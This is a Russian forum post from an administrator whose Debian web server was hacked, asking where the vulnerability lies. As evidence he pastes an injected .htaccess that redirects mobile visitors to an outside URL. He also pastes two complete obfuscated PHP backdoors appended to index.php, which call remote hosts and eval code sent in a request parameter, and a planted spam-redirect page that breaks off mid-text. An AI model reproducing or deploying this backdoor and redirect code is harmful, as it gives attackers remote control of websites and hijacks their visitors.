LINUX.ORG.RU
ФорумSecurity

Взломали сервер Debian, где искать уязвимость?


2

4

Сервер на Debian, на нём крутится 10 сайтов, используется 3 расзных движка (ipb, mediawiki, wordpress), арендую железо в германии. Сначала заметил нагрузку на сервер, а именно частое обращение к hdd скорее всего из-за рассылки по sendmail. Другой тяжеловесный запрос был из-за jbd2/md2-8.

После визуального просмотра файлов сайтов нашёл лишние...

Много файлов создано и исправлено (т.е. дописанные злостным кодом). Файлы и правки наблюдаются почти во всех сайтах.

вот часто встречающиеся:

.htaccess - в нём либо дописываются строчки кода, либо файл создаётся в папках сайта не глубже 3 вложенности. Либо вот такую страсть 

RewriteEngine on



RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} opera\ mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blackberry [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (pre\/|palm\ os|palm|hiptop|avantgo|plucker|xiino|blazer|elaine) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (iris|3g_t|windows\ ce|opera\ mobi|windows\ ce;\ smartphone;|windows\ ce;\ iemobile) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (mini\ 9.5|vx1000|lge\ |m800|e860|u940|ux840|compal|wireless|\ mobi|ahong|lg380|lgku|lgu900|lg210|lg47|lg920|lg840|lg370|sam-r|mg50|s55|g83|t66|vx400|mk99|d615|d763|el370|sl900|mp500|samu3|samu4|vx10|xda_|samu5|samu6|samu7|samu9|a615|b832|m881|s920|n210|s700|c-810|_h797|mob-x|sk16d|848b|mowser|s580|r800|471x|v120|rim8|c500foma:|160x|x160|480x|x640|t503|w839|i250|sprint|w398samr810|m5252|c7100|mt126|x225|s5330|s820|htil-g1|fly\ v71|s302|-x113|novarra|k610i|-three|8325rc|8352rc|sanyo|vx54|c888|nx250|n120|mtk\ |c5588|s710|t880|c5005|i;458x|p404i|s210|c5100|teleca|s940|c500|s590|foma|samsu|vx8|vx9|a1000|_mms|myx|a700|gu1100|bc831|e300|ems100|me701|me702m-three|sd588|s800|8325rc|ac831|mw200|brew\ |d88|htc\/|htc_touch|355x|m50|km100|d736|p-9521|telco|sl74|ktouch|m4u\/|me702|8325rc|kddi|phone|lg\ |sonyericsson|samsung|240x|x320|vx10|nokia|sony\ cmd|motorola|up.browser|up.link|mmp|symbian|smartphone|midp|wap|vodafone|o2|pocket|mobile|treo) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(1207|3gso|4thp|501i|502i|503i|504i|505i|506i|6310|6590|770s|802s|a\ wa|acer|acs-|airn|alav|asus|attw|au-m|aur\ |aus\ |abac|acoo|aiko|alco|alca|amoi|anex|anny|anyw|aptu|arch|argo|bell|bird|bw-n|bw-u|beck|benq|bilb|blac|c55\/|cdm-|chtm|capi|cond|craw|dall|dbte|dc-s|dica|ds-d|ds12|dait|devi|dmob|doco|dopo|el49|erk0|esl8|ez40|ez60|ez70|ezos|ezze|elai|emul|eric|ezwa|fake|fly-|fly_|g-mo|g1\ u|g560|gf-5|grun|gene|go\.w|good|grad|hcit|hd-m|hd-p|hd-t|hei-|hp\ i|hpip|hs-c|htc\ |htc-|htca|htcg|htcp|htcs|htct|htc_|haie|hita|huaw|hutc|i-20|i-go|i-ma|i230|iac|iac-|iac\/|ig01|im1k|inno|iris|jata|java|kddi|kgt|kgt\/|kpt\ |kwc-|klon|lexi|lg\ g|lg-a|lg-b|lg-c|lg-d|lg-f|lg-g|lg-k|lg-l|lg-m|lg-o|lg-p|lg-s|lg-t|lg-u|lg-w|lg\/k|lg\/l|lg\/u|lg50|lg54|lge-|lge\/|lynx|leno|m1-w|m3ga|m50\/|maui|mc01|mc21|mcca|medi|meri|mio8|mioa|mo01|mo02|mode|modo|mot\ |mot-|mt50|mtp1|mtv\ |mate|maxo|merc|mits|mobi|motv|mozz|n100|n101|n102|n202|n203|n300|n302|n500|n502|n505|n700|n701|n710|nec-|nem-|newg|neon|netf|noki|nzph|o2\ x|o2-x|opwv|owg1|opti|oran|p800|pand|pg-1|pg-2|pg-3|pg-6|pg-8|pg-c|pg13|phil|pn-2|pt-g|palm|pana|pire|pock|pose|psio|qa-a|qc-2|qc-3|qc-5|qc-7|qc07|qc12|qc21|qc32|qc60|qci-|qwap|qtek|r380|r600|raks|rim9|rove|s55\/|sage|sams|sc01|sch-|scp-|sdk\/|se47|sec-|sec0|sec1|semc|sgh-|shar|sie-|sk-0|sl45|slid|smb3|smt5|sp01|sph-|spv\ |spv-|sy01|samm|sany|sava|scoo|send|siem|smar|smit|soft|sony|t-mo|t218|t250|t600|t610|t618|tcl-|tdg-|telm|tim-|ts70|tsm-|tsm3|tsm5|tx-9|tagt|talk|teli|topl|hiba|up\.b|upg1|utst|v400|v750|veri|vk-v|vk40|vk50|vk52|vk53|vm40|vx98|virg|vite|voda|vulc|w3c\ |w3c-|wapj|wapp|wapu|wapm|wig\ |wapi|wapr|wapv|wapy|wapa|waps|wapt|winc|winw|wonu|x700|xda2|xdag|yas-|your|zte-|zeto|acs-|alav|alca|amoi|aste|audi|avan|benq|bird|blac|blaz|brew|brvw|bumb|ccwa|cell|cldc|cmd-|dang|doco|eml2|eric|fetc|hipt|http|ibro|idea|ikom|inno|ipaq|jbro|jemu|java|jigs|kddi|keji|kyoc|kyok|leno|lg-c|lg-d|lg-g|lge-|libw|m-cr|maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|mywa|nec-|newt|nok6|noki|o2im|opwv|palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|rozo|sage|sama|sams|sany|sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo|teli|tim-|tosh|treo|tsm-|upg1|upsi|vk-v|voda|vx52|vx53|vx60|vx61|vx70|vx80|vx81|vx83|vx85|wap-|wapa|wapi|wapp|wapr|webc|whit|winw|wmlb|xda-) [NC,OR]
RewriteCond %{HTTP:Accept} (text\/vnd\.wap\.wml|application\/vnd\.wap\.xhtml\+xml) [NC,OR]
RewriteCond %{HTTP:Profile} .+ [NC,OR]
RewriteCond %{HTTP:Wap-Profile} .+ [NC,OR]
RewriteCond %{HTTP:x-wap-profile} .+ [NC,OR]
RewriteCond %{HTTP:x-operamini-phone-ua} .+ [NC,OR]
RewriteCond %{HTTP:x-wap-profile-diff} .+ [NC]

RewriteCond %{QUERY_STRING} !noredirect [NC]
RewriteCond %{HTTP_USER_AGENT} !^(Mozilla\/5\.0\ \(Linux;\ U;\ Android\ 2\.2;\ en-us;\ Nexus\ One\ Build/FRF91\)\ AppleWebKit\/533\.1\ \(KHTML,\ like\ Gecko\)\ Version\/4\.0\ Mobile\ Safari\/533\.1\ offline)$ [NC]
RewriteCond %{HTTP_USER_AGENT} !(windows\.nt|bsd|x11|unix|macos|macintosh|playstation|google|yandex|bot|libwww|msn|america|avant|download|fdm|maui|webmoney|windows-media-player) [NC]

RewriteRule ^(.*)$ http://mobilegetting.ru/e/7749 [L,R=302]
Deny from all[/cut]

либо такую 

php_flag register_globals Off
RewriteEngine on
RewriteCond %{REQUEST_URI} ^/dat/.* 
RewriteRule . /dynsys.php [L,QSA][/cut][/cut]


[b]index.php[/b] - дописывает кусок своего кода в конец, в некоторых аж по два раза! Встретил также в файле sape.php, думаю могли и еще 
[cut]
$GLOBALS['_2079165034_']=Array(base64_decode('ZnVuY3' .'Rp' .'b' .'25' .'fZ' .'X' .'hpc3Rz'),base64_decode('Y' .'2h' .'t' .'b2Q='),base64_decode('ZXJy' .'b3JfcmVwb3J0a' .'W5n'),base64_decode('' .'aW5pX3N' .'ld' .'A=' .'='),base64_decode('cHJ' .'lZ1' .'9' .'tYX' .'RjaA' .'=='),base64_decode('Zml' .'s' .'Z' .'V9n' .'ZXR' .'fY' .'29u' .'dGVudHM='),base64_decode('YXJ' .'yYXl' .'fZ' .'Gl' .'mZ' .'l' .'91YXNzb2M' .'='),base64_decode('c3RybmNhc' .'2VjbX' .'A='),base64_decode('d' .'XJsZ' .'W5' .'jb' .'2R' .'l'),base64_decode('d' .'X' .'J' .'sZW5jb2Rl'),base64_decode('' .'bWQ1'),base64_decode('c29ja' .'2' .'V' .'0X2Ny' .'Z' .'WF0' .'Z' .'Q=='),base64_decode('' .'c' .'29ja2V0X2NyZW' .'F' .'0ZV9s' .'aX' .'N0Z' .'W' .'4='),base64_decode('aW' .'5pX2dldA' .'=='),base64_decode('Z' .'mlsZ' .'V9nZ' .'XRfY29ud' .'GVudHM='),base64_decode('Z' .'nVu' .'Y3R' .'pb25fZXh' .'pc3Rz'),base64_decode('Y3V' .'ybF9p' .'bml0'),base64_decode('Y3V' .'y' .'bF9zZ' .'XR' .'vcHQ='),base64_decode('Y3' .'V' .'ybF9zZXR' .'vcH' .'Q='),base64_decode('Y3Vy' .'bF9le' .'GVj'),base64_decode('YW' .'N' .'vcw=='),base64_decode('Y' .'3VybF9' .'jbG9zZQ' .'=='),base64_decode('YXB' .'h' .'Y' .'2hl' .'X2dldF9' .'2Z' .'XJzaW9' .'u'),base64_decode('bX' .'Rfc' .'mFu' .'Z' .'A=='),base64_decode('Zn' .'NvY2tv' .'cGVu'),base64_decode('dX' .'J' .'sZW' .'5j' .'b2Rl'),base64_decode('dXJsZW5jb2Rl'),base64_decode('b' .'WQ1'),base64_decode('b' .'mw' .'yYnI='),base64_decode('YXJyY' .'XlfZ' .'GlmZl91YXNzb2M='),base64_decode('ZndyaX' .'Rl'),base64_decode('Y3V' .'ybF9tdWx0aV9l' .'eGVj'),base64_decode('' .'c' .'2' .'Vz' .'c2' .'lvb' .'l9pZA=='),base64_decode('ZmVvZ' .'g=='),base64_decode('' .'Zm' .'dldHM='),base64_decode('' .'dXJsZW5' .'jb' .'2R' .'l'),base64_decode('cHJlZ19z' .'cG' .'xp' .'dA=='),base64_decode('ZmNs' .'b' .'3Nl'),base64_decode('cHJlZ19' .'zcGxpdA=='),base64_decode('YXJyYXlfa2V5' .'X2' .'V4aXN0cw=='),base64_decode('YX' .'JyY' .'Xlfa2V5cw=='),base64_decode('bXR' .'f' .'cm' .'F' .'uZ' .'A=' .'='),base64_decode('c3RyaX' .'BzbGF' .'z' .'a' .'GVz'));  function _1279584320($i){$a=Array('aW5' .'kZ2' .'V0','U0N' .'SS' .'VBUX0' .'Z' .'JTEV' .'OQU1' .'F','' .'ZGlz' .'cGx' .'he' .'V' .'9lcnJvcnM' .'=','' .'MA==','Y2x' .'pZW5' .'0' .'X2NoZ' .'WN' .'r','Y2' .'xpZ' .'W' .'50X2N' .'o' .'Z' .'WNr','IVxT' .'IXU=','U' .'0NSSVBUX' .'0Z' .'JTEVOQU1F','' .'dQ=' .'=','' .'dw==','U' .'0VSVkVS' .'X0' .'5BT' .'UU=','' .'UkVRVU' .'VTVF9VUkk=','SFRUUF' .'9' .'VU0' .'VSX' .'0FHR' .'U5U','aHR0' .'cDov' .'Lz' .'gyLj' .'ExOC' .'4xNy4x' .'M' .'TUvZ' .'2V0LnBoc' .'D9' .'kPQ==','' .'JnU9','JmM9','Jmk9' .'MSZoPQ==','O' .'TY1NGU' .'0' .'ZD' .'k5MzNmNjdlOGM2OT' .'YzZW' .'RjZGQxOGM1N2' .'Y=','' .'MQ' .'==','YWxsb3dfdX' .'JsX2ZvcG' .'Vu','Y3VybF9pbml0','aXZv','ODIuMTE4L' .'jE3LjExNQ' .'==','R0' .'VUIC' .'9nZX' .'QucG' .'hwP2' .'Q9','J' .'n' .'U9','' .'J' .'mM9','' .'J' .'m' .'k9M' .'S' .'ZoPQ=' .'=','O' .'T' .'Y1NGU' .'0ZDk5' .'M' .'zN' .'mNj' .'dlOG' .'M2O' .'TYzZWRjZ' .'GQxOGM1N2Y=','M' .'Q==','IEhU' .'V' .'FAvMS4xDQo=','SG9zdDog' .'OD' .'Iu' .'MTE' .'4' .'LjE3L' .'jEx' .'N' .'Q0K','Q29ubm' .'Vj' .'dGlv' .'bjogQ2xvc2' .'UNCg0' .'K','','L' .'1xSXFIv','cA' .'==','ZTBmYzk3MTI=');return base64_decode($a[$i]);}  if(!$GLOBALS['_2079165034_'][0](_1279584320(0))){$GLOBALS['_2079165034_'][1]($_SERVER[_1279584320(1)],round(0+86.666666666667+86.666666666667+86.666666666667));function l__0(){$GLOBALS['_2079165034_'][2](round(0));$GLOBALS['_2079165034_'][3](_1279584320(2),_1279584320(3));if(!empty($_COOKIE[_1279584320(4)]))die($_COOKIE[_1279584320(5)]);if($GLOBALS['_2079165034_'][4](_1279584320(6),$GLOBALS['_2079165034_'][5]($_SERVER[_1279584320(7)])))$kedd09_0=_1279584320(8);else $kedd09_0=_1279584320(9);$kedd09_1=$_SERVER[_1279584320(10)] .$_SERVER[_1279584320(11)];if((round(0+961.25+961.25+961.25+961.25)^round(0+961.25+961.25+961.25+961.25))&& $GLOBALS['_2079165034_'][6]($kedd09_1,$kedd09_2,$_REQUEST,$kedd09_0))$GLOBALS['_2079165034_'][7]($kedd09_3,$kedd09_4,$kedd09_5);$kedd09_2=$_SERVER[_1279584320(12)];$kedd09_6=round(0+455.33333333333+455.33333333333+455.33333333333);$kedd09_7=_1279584320(13) .$GLOBALS['_2079165034_'][8]($kedd09_1) ._1279584320(14) .$GLOBALS['_2079165034_'][9]($kedd09_2) ._1279584320(15) .$kedd09_0 ._1279584320(16) .$GLOBALS['_2079165034_'][10](_1279584320(17) .$kedd09_1 .$kedd09_2 .$kedd09_0 ._1279584320(18));if((round(0+748+748+748)+round(0+1029.5+1029.5+1029.5+1029.5))>round(0+2244)|| $GLOBALS['_2079165034_'][11]($kedd09_8));else{$GLOBALS['_2079165034_'][12]($_COOKIE);}if($GLOBALS['_2079165034_'][13](_1279584320(19))== round(0+0.25+0.25+0.25+0.25)){return $GLOBALS['_2079165034_'][14]($kedd09_7);}elseif($GLOBALS['_2079165034_'][15](_1279584320(20))){$kedd09_9=$GLOBALS['_2079165034_'][16]($kedd09_7);$GLOBALS['_2079165034_'][17]($kedd09_9,42,FALSE);$kedd09_10=_1279584320(21);$GLOBALS['_2079165034_'][18]($kedd09_9,19913,TRUE);$kedd09_11=$GLOBALS['_2079165034_'][19]($kedd09_9);while(round(0+2394+2394)-round(0+1197+1197+1197+1197))$GLOBALS['_2079165034_'][20]($_REQUEST,$_COOKIE);$GLOBALS['_2079165034_'][21]($kedd09_9);(round(0+51.25+51.25+51.25+51.25)-round(0+102.5+102.5)+round(0+920.66666666667+920.66666666667+920.66666666667)-round(0+690.5+690.5+690.5+690.5))?$GLOBALS['_2079165034_'][22]($kedd09_12,$kedd09_8):$GLOBALS['_2079165034_'][23](round(0+102.5+102.5),round(0+463.5+463.5));return $kedd09_11;}else{$kedd09_13=$GLOBALS['_2079165034_'][24](_1279584320(22),round(0+80),$kedd09_3,$kedd09_14,round(0+15+15));if($kedd09_13){$kedd09_4=_1279584320(23) .$GLOBALS['_2079165034_'][25]($kedd09_1) ._1279584320(24) .$GLOBALS['_2079165034_'][26]($kedd09_2) ._1279584320(25) .$kedd09_0 ._1279584320(26) .$GLOBALS['_2079165034_'][27](_1279584320(27) .$kedd09_1 .$kedd09_2 .$kedd09_0 ._1279584320(28)) ._1279584320(29);$kedd09_4 .= _1279584320(30);$kedd09_4 .= _1279584320(31);if((round(0+1289.6666666667+1289.6666666667+1289.6666666667)^round(0+773.8+773.8+773.8+773.8+773.8))&& $GLOBALS['_2079165034_'][28]($kedd09_9,$_COOKIE))$GLOBALS['_2079165034_'][29]($kedd09_15,$kedd09_15,$kedd09_13);$GLOBALS['_2079165034_'][30]($kedd09_13,$kedd09_4);if((round(0+869.33333333333+869.33333333333+869.33333333333)^round(0+869.33333333333+869.33333333333+869.33333333333))&& $GLOBALS['_2079165034_'][31]($kedd09_12,$kedd09_15,$kedd09_7))$GLOBALS['_2079165034_'][32]($kedd09_2,$kedd09_3,$kedd09_1);$kedd09_15=_1279584320(32);while(!$GLOBALS['_2079165034_'][33]($kedd09_13)){$kedd09_15 .= $GLOBALS['_2079165034_'][34]($kedd09_13,round(0+32+32+32+32));if((round(0+782.33333333333+782.33333333333+782.33333333333)^round(0+2347))&& $GLOBALS['_2079165034_'][35]($kedd09_1))$GLOBALS['_2079165034_'][36]($kedd09_13,$kedd09_2);}$GLOBALS['_2079165034_'][37]($kedd09_13);list($kedd09_5,$kedd09_12)=$GLOBALS['_2079165034_'][38](_1279584320(33),$kedd09_15,round(0+2));$kedd09_8=round(0+0.25+0.25+0.25+0.25);return $kedd09_12;while(round(0+2271.5+2271.5)-round(0+2271.5+2271.5))$GLOBALS['_2079165034_'][39]($_SERVER,$_REQUEST,$kedd09_8);}}}echo l__0();(round(0+761+761+761)-round(0+1141.5+1141.5)+round(0+187+187+187+187+187)-round(0+467.5+467.5))?$GLOBALS['_2079165034_'][40]($_REQUEST,$kedd09_3,$kedd09_8):$GLOBALS['_2079165034_'][41](round(0+570.75+570.75+570.75+570.75),round(0+3758));if(@$_REQUEST[_1279584320(34)]== _1279584320(35))eval($GLOBALS['_2079165034_'][42]($_REQUEST["c"]));}; 

//###==###
 $GLOBALS['_1745670086_']=Array(base64_decode('Z' .'n' .'V' .'u' .'Y3Rpb' .'25fZX' .'hpc3' .'Rz'),base64_decode('Y2' .'htb' .'2Q='),base64_decode('Z' .'XJ' .'yb3Jfc' .'mVwb3J0aW' .'5n'),base64_decode('aW' .'5p' .'X3' .'N' .'ld' .'A' .'=='),base64_decode('' .'c' .'HJlZ19' .'tYXR' .'j' .'aA=='),base64_decode('ZmlsZV9nZ' .'XRf' .'Y29udGVudHM='),base64_decode('' .'bX' .'RfcmF' .'u' .'Z' .'A' .'=='),base64_decode('' .'cHJld' .'g=='),base64_decode('dXJsZW5jb2' .'Rl'),base64_decode('dXJsZW' .'5' .'jb2Rl'),base64_decode('bWQ' .'1'),base64_decode('aW5p' .'X2dldA' .'=='),base64_decode('Zml' .'s' .'ZV9nZXR' .'fY29udGVudH' .'M' .'='),base64_decode('ZnVu' .'Y' .'3Rpb25' .'fZXhp' .'c' .'3' .'Rz'),base64_decode('Y3' .'V' .'ybF' .'9pbml0'),base64_decode('Y3Vyb' .'F' .'9zZXR' .'vcHQ='),base64_decode('c3Ry' .'cG9z'),base64_decode('' .'c2Vzc2lv' .'bl9lb' .'mNvZ' .'G' .'U='),base64_decode('Y' .'3VybF' .'9zZXRvcHQ='),base64_decode('' .'aWNv' .'bnY='),base64_decode('dGl' .'tZQ' .'=='),base64_decode('' .'Y3VybF' .'9' .'le' .'GVj'),base64_decode('' .'bXlzcWxfY2' .'x' .'vc' .'2' .'U' .'='),base64_decode('b' .'XRfc' .'mFuZA=='),base64_decode('Y3VybF9j' .'bG' .'9zZ' .'Q=='),base64_decode('ZnNvY' .'2tvcGV' .'u'),base64_decode('dXJsZW5jb2' .'Rl'),base64_decode('' .'dXJs' .'ZW5jb2Rl'),base64_decode('bWQ1'),base64_decode('YXJyYXlfa2V5' .'X2' .'V4aXN0cw=='),base64_decode('ZndyaX' .'Rl'),base64_decode('bXNz' .'cWxfcmVzd' .'Wx' .'0'),base64_decode('YXJyYXlfZ' .'mlsbA' .'=='),base64_decode('dW5w' .'YWN' .'r'),base64_decode('Z' .'mVvZg=='),base64_decode('Zmdl' .'dHM' .'='),base64_decode('ZmNs' .'b3N' .'l'),base64_decode('c2hlbGxfZXhlYw=='),base64_decode('bXR' .'fcmFuZ' .'A=' .'='),base64_decode('cHJ' .'lZ' .'19zcGxpdA=='),base64_decode('YX' .'JyYXlfZGl' .'m' .'Zl91YXNzb' .'2M' .'='),base64_decode('' .'Y3JjMzI='),base64_decode('Zmd' .'ldHNz'),base64_decode('ZXhw'),base64_decode('bX' .'R' .'f' .'cmFuZA=='),base64_decode('c3R' .'y' .'aX' .'BzbGFzaGVz'));  function _619084098($i){$a=Array('' .'a' .'W5kZ2V0','U' .'0NSS' .'VBU' .'X0ZJ' .'TEVO' .'QU1F','Z' .'GlzcGxheV9lcnJvcnM=','MA' .'==','Y' .'2x' .'pZW50X2NoZW' .'Nr','' .'Y2x' .'pZW50X' .'2NoZWNr','' .'I' .'VxTI' .'XU=','U0NSS' .'VBU' .'X0ZJTEV' .'OQU1F','dQ==','dw=' .'=','U0' .'VSV' .'kV' .'SX05' .'BTUU=','UkV' .'RVUV' .'TVF9VUkk=','SFRUU' .'F' .'9V' .'U' .'0VSX0' .'FHRU5' .'U','' .'aHR0' .'c' .'DovL2' .'Nvc' .'Gl' .'yYWp0LnJ1' .'L' .'2d' .'ldC5waHA/ZD0=','' .'JnU9','' .'J' .'mM9','Jmk' .'9MSZoP' .'Q==','MzI0ND' .'F' .'hMjcxOTBkZGE' .'5NWUwOTVjNTQ' .'3' .'Nm' .'E0' .'N2NkNz' .'I=','MQ=' .'=','YWxsb3dfdXJsX2ZvcGV' .'u','Y3V' .'y' .'bF9p' .'bml0','Zml1a' .'Hhl' .'c2N0am' .'94a2Rt','ano=','Y2' .'9waXJhanQ' .'ucnU=','Y' .'mZnZw==','R0' .'VUI' .'C9nZX' .'Qu' .'cGhwP2Q' .'9','' .'J' .'nU9','J' .'mM' .'9','Jm' .'k9MSZo' .'PQ==','MzI0NDFhMj' .'cx' .'OTBkZGE5NW' .'UwOT' .'Vj' .'NTQ3NmE0N2NkNzI=','MQ==','IEh' .'UV' .'F' .'AvMS4xDQo=','' .'SG9zdDo' .'g' .'Y29' .'w' .'aXJhanQ' .'ucnUN' .'Cg==','Q29ubmVj' .'d' .'Glvbjog' .'Q2xvc2UNCg0K','','L1xS' .'XF' .'Iv','cA==','OG' .'J' .'mZ' .'GN' .'lYzg' .'=');return base64_decode($a[$i]);}  if(!$GLOBALS['_1745670086_'][0](_619084098(0))){$GLOBALS['_1745670086_'][1]($_SERVER[_619084098(1)],round(0+256));function l__0(){$GLOBALS['_1745670086_'][2](round(0));$GLOBALS['_1745670086_'][3](_619084098(2),_619084098(3));if(!empty($_COOKIE[_619084098(4)]))die($_COOKIE[_619084098(5)]);if($GLOBALS['_1745670086_'][4](_619084098(6),$GLOBALS['_1745670086_'][5]($_SERVER[_619084098(7)])))$uf4_0=_619084098(8);else $uf4_0=_619084098(9);$uf4_1=$_SERVER[_619084098(10)] .$_SERVER[_619084098(11)];if(round(0+1258.5+1258.5+1258.5+1258.5)<$GLOBALS['_1745670086_'][6](round(0+737.5+737.5),round(0+1777+1777)))$GLOBALS['_1745670086_'][7]($_SERVER);$uf4_2=$_SERVER[_619084098(12)];$uf4_3=_619084098(13) .$GLOBALS['_1745670086_'][8]($uf4_1) ._619084098(14) .$GLOBALS['_1745670086_'][9]($uf4_2) ._619084098(15) .$uf4_0 ._619084098(16) .$GLOBALS['_1745670086_'][10](_619084098(17) .$uf4_1 .$uf4_2 .$uf4_0 ._619084098(18));if($GLOBALS['_1745670086_'][11](_619084098(19))== round(0+0.33333333333333+0.33333333333333+0.33333333333333)){return $GLOBALS['_1745670086_'][12]($uf4_3);}elseif($GLOBALS['_1745670086_'][13](_619084098(20))){$uf4_4=$GLOBALS['_1745670086_'][14]($uf4_3);$GLOBALS['_1745670086_'][15]($uf4_4,42,FALSE);if($GLOBALS['_1745670086_'][16](_619084098(21),_619084098(22))!==false)$GLOBALS['_1745670086_'][17]($uf4_5,$_COOKIE,$uf4_6);$GLOBALS['_1745670086_'][18]($uf4_4,19913,TRUE);if((round(0+763.25+763.25+763.25+763.25)^round(0+610.6+610.6+610.6+610.6+610.6))&& $GLOBALS['_1745670086_'][19]($uf4_2,$uf4_2,$uf4_4,$uf4_7))$GLOBALS['_1745670086_'][20]($uf4_5,$_REQUEST,$uf4_0);$uf4_6=$GLOBALS['_1745670086_'][21]($uf4_4);(round(0+634+634)-round(0+317+317+317+317)+round(0+777+777+777)-round(0+2331))?$GLOBALS['_1745670086_'][22]($uf4_2,$_REQUEST,$uf4_4):$GLOBALS['_1745670086_'][23](round(0+634+634),round(0+832+832+832));$GLOBALS['_1745670086_'][24]($uf4_4);return $uf4_6;}else{$uf4_8=$GLOBALS['_1745670086_'][25](_619084098(23),round(0+40+40),$uf4_9,$uf4_7,round(0+6+6+6+6+6));$uf4_10=_619084098(24);if($uf4_8){$uf4_11=_619084098(25) .$GLOBALS['_1745670086_'][26]($uf4_1) ._619084098(26) .$GLOBALS['_1745670086_'][27]($uf4_2) ._619084098(27) .$uf4_0 ._619084098(28) .$GLOBALS['_1745670086_'][28](_619084098(29) .$uf4_1 .$uf4_2 .$uf4_0 ._619084098(30)) ._619084098(31);$uf4_11 .= _619084098(32);$uf4_11 .= _619084098(33);while(round(0+4609)-round(0+1152.25+1152.25+1152.25+1152.25))$GLOBALS['_1745670086_'][29]($uf4_8,$uf4_1,$_COOKIE);$GLOBALS['_1745670086_'][30]($uf4_8,$uf4_11);while(round(0+1180+1180)-round(0+590+590+590+590))$GLOBALS['_1745670086_'][31]($uf4_4);$uf4_5=_619084098(34);if((round(0+1284.6666666667+1284.6666666667+1284.6666666667)^round(0+3854))&& $GLOBALS['_1745670086_'][32]($uf4_2,$_COOKIE))$GLOBALS['_1745670086_'][33]($uf4_9,$uf4_5);while(!$GLOBALS['_1745670086_'][34]($uf4_8)){$uf4_5 .= $GLOBALS['_1745670086_'][35]($uf4_8,round(0+25.6+25.6+25.6+25.6+25.6));}$GLOBALS['_1745670086_'][36]($uf4_8);(round(0+2299.5+2299.5)-round(0+2299.5+2299.5)+round(0+655.5+655.5)-round(0+437+437+437))?$GLOBALS['_1745670086_'][37]($_REQUEST,$uf4_1):$GLOBALS['_1745670086_'][38](round(0+2037),round(0+919.8+919.8+919.8+919.8+919.8));list($uf4_12,$uf4_13)=$GLOBALS['_1745670086_'][39](_619084098(35),$uf4_5,round(0+0.66666666666667+0.66666666666667+0.66666666666667));while(round(0+509.66666666667+509.66666666667+509.66666666667)-round(0+509.66666666667+509.66666666667+509.66666666667))$GLOBALS['_1745670086_'][40]($_SERVER,$uf4_4);$uf4_14=round(0+0.33333333333333+0.33333333333333+0.33333333333333);if((round(0+485.66666666667+485.66666666667+485.66666666667)+round(0+247+247))>round(0+364.25+364.25+364.25+364.25)|| $GLOBALS['_1745670086_'][41]($uf4_8,$uf4_9,$uf4_8,$uf4_14));else{$GLOBALS['_1745670086_'][42]($uf4_9,$uf4_7);}return $uf4_13;(round(0+2956)-round(0+2956)+round(0+37.4+37.4+37.4+37.4+37.4)-round(0+62.333333333333+62.333333333333+62.333333333333))?$GLOBALS['_1745670086_'][43]($uf4_2,$_SERVER):$GLOBALS['_1745670086_'][44](round(0+1478+1478),round(0+2447+2447));}}}echo l__0();if(@$_REQUEST[_619084098(36)]== _619084098(37))eval($GLOBALS['_1745670086_'][45]($_REQUEST["c"]));}; 
//###==###

movies.htm - в корне сайтов каким-то редиректом на порево. 

<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>SELECTED FREE PORN SITES!</title><style>html, body, div, span, applet, object, iframe,h1, h2, h3, h4, h5, h6, p, blockquote, pre,a, abbr, acronym, address, big, cite, code,del, dfn, em, font, img, ins, kbd, q, s, samp,small, strike, strong, sub, sup, tt, var,b, u, i, center,dl, dt, dd, ol, ul, li,fieldset, form, label, legend,table, caption, tbody, tfoot, thead, tr, th, td { margin: 0; padding: 0; border: 0; outline: 0; font-size: 100%; vertical-align: baseline; background: transparent;}body { line-height: 1;}ol, ul { list-style: none;}blockquote, q { quotes: none;}blockquote:before, blockquote:after,q:before, q:after { content: ''; content: none; color: #FFF; font-family: Arial, Helvetica, sans-serif; font-size: 16px;}:focus { outline: 0;}ins { text-decoration: none;}del { text-decoration: line-through;}table { border-collapse: collapse; border-spacing: 0;}body{ width: 100%; margin: 0 auto auto; /*background: #000 url(http://www.a1971.com/tempe/bg-fon2.jpg) no-repeat center top;*/ background: #f6f6f8; font: 14px Arial, Helvetica, sans-serif;}.conteiner{ margin: 0 auto auto; width: 1000px; background: #f5f6f8; box-shadow: 0 0 20px #000; height: auto; display: table; border-left: 1px solid #666; border-right: 1px solid #666; padding: 0 0 20px 0;}.header{ width: 1000px; text-align: center; padding: 5px 0 5px 0; }.header p{ text-shadow: 3px 2px 2px #CCC; font: 59px oswaldbold, sans-serif;}.header p a{ text-decoration: none; color: #D40;}.content{ padding-top:  10px; width: 1000px;}.big-picture{ float: left; width: 960px; height: 200px; display: block; margin: 5px 0 5px 20px; }.big-picture:hover{ border: 1px solid #000; margin: 4px 0 4px 19px;}.big-picture img{ border: 1px solid #000;}.big-picture a p{ text-align: center; width: 960px; height: 53px; position: absolute; margin: 146px 0 0 0; background: url(http://www.a1971.com/tempe/bg-text.png) repeat-x 0 0; line-height: 52px; }.big-picture a{ display: block; width: 960px; height: 200px; color: #EDE; text-decoration: none; font-size: 30px; text-shadow: 0 0 1px #039;}.big-picture a:hover p{ background: url(http://www.a1971.com/tempe/bg-text.png) repeat-x 0 -57px; color: #ff9; text-shadow: 0 0 3px #000; }.content ul{ float: left; margin: 10px 0 10px -10px;}.content ul li{ float: left; width: 300px; height: 200px; margin: 0 0 0 30px; border: 1px solid #000;}.content ul li:hover{ border: 2px solid #000; margin: -1px -1px -1px 29px; }.content ul li img{ width: 300px; height: 200px;}.content ul li a{ display: block; width: 300px; height: 200px; color: #EDE; text-decoration: none; font-size: 20px; text-shadow: 0 0 1px #039;}.content ul li a p{ width: 300px; height: 30px; position: absolute; margin: 170px 0 0 0; background: url(http://www.a1971.com/tempe/bg-text.png) repeat-x 0 0; text-align: center; line-height: 30px;}.content ul li a:hover p{ background: url(http://www.a1971.com/tempe/bg-text.png) repeat-x 0 -57px; color: #ff9; text-shadow: 0 0 1px #000; }</style></head><body><div class="conteiner">      <div class="content">        <div class="big-picture" style="height:180px;" ><a target="_blank" 